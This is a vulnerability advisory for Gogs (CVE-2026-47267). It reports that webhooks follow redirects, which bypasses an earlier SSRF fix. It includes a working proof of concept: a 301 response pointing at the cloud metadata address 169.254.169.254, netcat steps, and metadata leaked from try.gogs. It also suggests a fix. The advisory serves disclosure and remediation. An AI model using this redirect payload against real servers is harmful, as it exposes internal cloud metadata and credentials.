PT-2026-51449 · Go · Gogs.Io/Gogs
Published
2026-06-22
·
Updated
2026-06-22
·
CVE-2026-47267
None
No severity ratings or metrics are available. When they are, we'll update the corresponding info on the page.
Summary
The fix for CVE-2022-1285 prevents adding webooks or running webhooks with URLs with a hostname that resolves in localCIDRs. However, webhooks still follow redirects allowing to access hostname inside localCIDRs.
This was already communicated in the initial report but it looks like there was a bit of a miscommunication.
Details
By creating a webook pointing to any URL that will return the following:
HTTP/1.1 301 Moved Permanently
Location: http://169.254.169.254/metadata/v1.json
Content-Length: 0
Connection: closeIt is possible to access 169.254.169.254
PoC
- Run netcat on any server
- Use this server as the webhook URL
- Once you get the request from the webhook (for example by testing it), copy the response above
Results from running this on try.gogs:
{"droplet id":456901166,"hostname":"gogs-do-nyc3-01","vendor data":"Content-Type: multipart/mixed; boundary="===============8645434374073493512=="
MIME-Version: 1.0
--===============8645434374073493512==
MIME-Version: 1.0
Content-Type: text/cloud-config; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config"
#cloud-config
# Enable root and password auth
disable roo...{"dhcp enabled":false,"vpc peering enabled":false},"dotty status":"running","ssh info":{"port":22}}Impact
Server Side Request Forgery
Fix
The "simplest way" to fix it is most likely to leverage Client.CheckRedirect https://pkg.go.dev/net/http#hdr-Clients and Transports to check if the redirect is pointing to a blocked hostname
SSRF
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Gogs.Io/Gogs